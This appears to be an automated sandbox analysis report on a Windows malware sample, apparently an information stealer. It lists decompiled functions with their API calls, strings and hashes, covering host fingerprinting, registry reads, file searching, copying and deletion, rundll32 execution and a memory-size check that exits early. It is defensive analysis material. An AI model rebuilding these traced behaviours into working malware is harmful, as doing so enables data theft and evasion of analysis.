Opcode ID: 711d8f6a10e75bb5d055e7e230e9327b1ae379b0ea3a28b5d189bc8247e8d0a0
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: 711d8f6a10e75bb5d055e7e230e9327b1ae379b0ea3a28b5d189bc8247e8d0a0
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287248,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

<, xrefs: 004112AC
"" , xrefs: 004111DC
.dll, xrefs: 00411054
C:\Windows\system32\rundll32.dll, xrefs: 004110BF

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 0e9437e8d053a23501fbb8a056bfe5024d69615cb28cfc68b982569c8378dc88
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 0e9437e8d053a23501fbb8a056bfe5024d69615cb28cfc68b982569c8378dc88
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,04285E08), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,0427F978), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,042867D0), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: b85be69403b5b0e32a1e76b306a3cc42adcecca7b7cf16ed6142b63093e4e100
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: b85be69403b5b0e32a1e76b306a3cc42adcecca7b7cf16ed6142b63093e4e100
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 68C2C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 68C2C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 68C2C969
GetSystemInfo.KERNEL32(?), ref: 68C2C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 68C2C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 68C2C9E2

Memory Dump Source

Source File: 00000008.00000002.3041554680.0000000068C11000.00000020.00000001.01000000.00000018.sdmp, Offset: 68C10000, based on PE: true

Associated: 00000008.00000002.3041520041.0000000068C10000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041646591.0000000068C8D000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041691871.0000000068C9E000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041724661.0000000068CA2000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68c10000_u2xs.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: c0ae96f49d73e010abe4e127c2d6e7c3fc8f4fe7a45ab257d0cf06dd9855232d
Instruction ID: 1774be2f2cc12368c461f589b11a14ade41888fd3f6361be1fa093929110f2ad
Opcode Fuzzy Hash: c0ae96f49d73e010abe4e127c2d6e7c3fc8f4fe7a45ab257d0cf06dd9855232d
Instruction Fuzzy Hash: CA212676640214EBDF04AF28DC98BAE73B9FF46700F90011AF956A7280FB70DC058790

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,042805B0), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: ee7a01aa7744ed27a2b54628d0f838df438fed403874761a0fd3cd9fcf991400
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: ee7a01aa7744ed27a2b54628d0f838df438fed403874761a0fd3cd9fcf991400
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,042830C0,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,04286890,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,04283210,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,04286300,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(04280480,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(04286B90,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04280410,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(04280480,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: b6dbafc1a03e27f6626380e8bf065da165f359ae4b1d109773c9ed381b57463f
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: b6dbafc1a03e27f6626380e8bf065da165f359ae4b1d109773c9ed381b57463f
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623
@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 004065DD, 004065FD, 0040667F

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 951760b987e06e8a860a3c2ebdd1826ba94798ea02555701aa725d394a0ea192
Instruction ID: a6ff4a179f0f45457bced01bd357d8ea5483897910f719e2b1a01999acf3c781
Opcode Fuzzy Hash: 951760b987e06e8a860a3c2ebdd1826ba94798ea02555701aa725d394a0ea192
Instruction Fuzzy Hash: 632131B4A00208EFCB04CF84C550BADBBB1FF48304F1185AAD506AB391D7399A51CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287248,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 118c675051ba010f8dd39ddecf7ddf62060751c3c868e8a90e3d21332475743d
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: 118c675051ba010f8dd39ddecf7ddf62060751c3c868e8a90e3d21332475743d
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,04283210,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04286300,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04286910,00000000,?,0041D74C,00000000,?,00000000,00000000,?,042805D0), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04286910,00000000,?,0041D74C,00000000,?,00000000,00000000,?,042805D0), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04280330,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,042863A8,00000000,?,0041D758,00000000,?,00000000,00000000,?,04286930,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,042863A8,00000000,?,0041D758,00000000,?,00000000,00000000,?,04286930,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,04286950,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04286258,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,042830C0,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04286890,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04285D90,00000000,?,0041D774,00000000,?,00000000,00000000,?,04285E38), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
